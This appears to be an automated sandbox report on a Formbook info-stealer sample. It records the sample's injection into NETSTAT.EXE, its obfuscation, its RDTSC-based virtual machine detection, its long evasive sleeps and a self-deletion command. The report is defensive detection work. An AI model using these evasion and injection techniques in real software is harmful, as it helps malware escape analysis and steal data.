Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479780 NtMapViewOfSection,LdrInitializeThunk, 10_2_03479780
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479A50 NtCreateFile,LdrInitializeThunk, 10_2_03479A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479650 NtQueryValueKey,LdrInitializeThunk, 10_2_03479650
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479660 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_03479660
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034796D0 NtCreateKey,LdrInitializeThunk, 10_2_034796D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034796E0 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_034796E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479540 NtReadFile,LdrInitializeThunk, 10_2_03479540
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479910 NtAdjustPrivilegesToken,LdrInitializeThunk, 10_2_03479910
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034795D0 NtClose,LdrInitializeThunk, 10_2_034795D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034799A0 NtCreateSection,LdrInitializeThunk, 10_2_034799A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479840 NtDelayExecution,LdrInitializeThunk, 10_2_03479840
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479860 NtQuerySystemInformation,LdrInitializeThunk, 10_2_03479860
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479760 NtOpenProcess, 10_2_03479760
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479770 NtSetInformationFile, 10_2_03479770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0347A770 NtOpenThread, 10_2_0347A770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479B00 NtSetValueKey, 10_2_03479B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0347A710 NtOpenProcessToken, 10_2_0347A710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479730 NtQueryVirtualMemory, 10_2_03479730
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034797A0 NtUnmapViewOfSection, 10_2_034797A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0347A3B0 NtGetContextThread, 10_2_0347A3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479670 NtQueryInformationProcess, 10_2_03479670
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479A00 NtProtectVirtualMemory, 10_2_03479A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479610 NtEnumerateValueKey, 10_2_03479610
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479A10 NtQuerySection, 10_2_03479A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479A20 NtResumeThread, 10_2_03479A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479A80 NtOpenDirectoryObject, 10_2_03479A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479950 NtQueueApcThread, 10_2_03479950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479560 NtWriteFile, 10_2_03479560
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479520 NtWaitForSingleObject, 10_2_03479520
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0347AD30 NtSetContextThread, 10_2_0347AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034799D0 NtCreateProcessEx, 10_2_034799D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034795F0 NtQueryInformationFile, 10_2_034795F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0347B040 NtSuspendThread, 10_2_0347B040
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03479820 NtEnumerateKey, 10_2_03479820
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034798F0 NtReadVirtualMemory, 10_2_034798F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034798A0 NtWriteVirtualMemory, 10_2_034798A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_009681B0 NtCreateFile, 10_2_009681B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_009682E0 NtClose, 10_2_009682E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00968260 NtReadFile, 10_2_00968260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00968390 NtAllocateVirtualMemory, 10_2_00968390
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_009681AC NtCreateFile, 10_2_009681AC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00968202 NtCreateFile, 10_2_00968202
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0096840A NtAllocateVirtualMemory, 10_2_0096840A
Detected potential crypto function
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041B84A 4_2_0041B84A
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_00401030 4_2_00401030
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_00408C4C 4_2_00408C4C
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_00408C50 4_2_00408C50
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041B496 4_2_0041B496
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041CD52 4_2_0041CD52
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041C514 4_2_0041C514
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041C527 4_2_0041C527
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_00402D88 4_2_00402D88
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_00402D90 4_2_00402D90
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041CDA7 4_2_0041CDA7
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041CE79 4_2_0041CE79
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041BE0B 4_2_0041BE0B
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041CF31 4_2_0041CF31
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_00402FB0 4_2_00402FB0
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0049BF7F 4_2_0049BF7F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0346EBB0 10_2_0346EBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03456E30 10_2_03456E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03501D55 10_2_03501D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0343F900 10_2_0343F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03430D20 10_2_03430D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03454120 10_2_03454120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344D5E0 10_2_0344D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03462581 10_2_03462581
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_034F1002 10_2_034F1002
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344841F 10_2_0344841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0344B090 10_2_0344B090
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0096B496 10_2_0096B496
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00958C50 10_2_00958C50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00958C4C 10_2_00958C4C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00952D90 10_2_00952D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00952D88 10_2_00952D88
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0096CDA7 10_2_0096CDA7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0096C514 10_2_0096C514
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0096C527 10_2_0096C527
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0096CD52 10_2_0096CD52
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0096CE79 10_2_0096CE79
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00952FB0 10_2_00952FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0096CF31 10_2_0096CF31
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0343B150 appears 32 times
Sample file is different than original file name gathered from version info
Source: NQBNpLezqZKv1P4.exe, 00000000.00000000.636900304.0000000000102000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFixedBufferAttribu.exe8 vs NQBNpLezqZKv1P4.exe
Source: NQBNpLezqZKv1P4.exe Binary or memory string: OriginalFilename vs NQBNpLezqZKv1P4.exe
Source: NQBNpLezqZKv1P4.exe, 00000004.00000003.697053653.0000000000DD6000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NQBNpLezqZKv1P4.exe
Source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs NQBNpLezqZKv1P4.exe
Source: NQBNpLezqZKv1P4.exe, 00000004.00000000.696683735.0000000000492000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFixedBufferAttribu.exe8 vs NQBNpLezqZKv1P4.exe
Source: NQBNpLezqZKv1P4.exe Binary or memory string: OriginalFilenameFixedBufferAttribu.exe8 vs NQBNpLezqZKv1P4.exe
Uses 32bit PE files
Source: NQBNpLezqZKv1P4.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: NQBNpLezqZKv1P4.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: NQBNpLezqZKv1P4.exe, ControlePorTwitter/Business/Seguranca.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.NQBNpLezqZKv1P4.exe.100000.0.unpack, ControlePorTwitter/Business/Seguranca.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.NQBNpLezqZKv1P4.exe.490000.0.unpack, ControlePorTwitter/Business/Seguranca.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.NQBNpLezqZKv1P4.exe.490000.1.unpack, ControlePorTwitter/Business/Seguranca.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@7/6
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NQBNpLezqZKv1P4.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
Source: NQBNpLezqZKv1P4.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe' Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: NQBNpLezqZKv1P4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: NQBNpLezqZKv1P4.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041522D push esi; retf 4_2_00415240
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041B3F2 push eax; ret 4_2_0041B3F8
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041B3FB push eax; ret 4_2_0041B462
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041B3A5 push eax; ret 4_2_0041B3F8
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0041B45C push eax; ret 4_2_0041B462
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_0040F646 push edi; retf 4_2_0040F64A
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_00415628 push ss; iretd 4_2_00415637
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_00414E32 push ds; iretd 4_2_00414E33
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0348D0D1 push ecx; ret 10_2_0348D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0096522D push esi; retf 10_2_00965240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0096B3A5 push eax; ret 10_2_0096B3F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0096B3F2 push eax; ret 10_2_0096B3F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0096B3FB push eax; ret 10_2_0096B462
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0096B45C push eax; ret 10_2_0096B462
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00964E32 push ds; iretd 10_2_00964E33
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00965628 push ss; iretd 10_2_00965637
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0095F646 push edi; retf 10_2_0095F64A
Source: initial sample Static PE information: section name: .text entropy: 7.57888986763
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 00000000009585E4 second address: 00000000009585EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 000000000095896E second address: 0000000000958974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Code function: 4_2_004088A0 rdtsc 4_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe TID: 6944 Thread sleep time: -59255s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe TID: 6972 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6020 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Thread delayed: delay time: 59255 Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
